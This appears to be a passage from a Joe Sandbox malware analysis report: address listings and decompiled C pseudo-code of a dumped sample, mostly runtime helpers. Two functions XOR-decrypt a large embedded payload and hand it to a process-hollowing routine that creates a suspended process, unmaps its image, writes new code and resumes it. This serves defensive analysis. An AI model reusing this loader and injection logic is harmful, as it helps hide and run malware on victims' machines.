    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
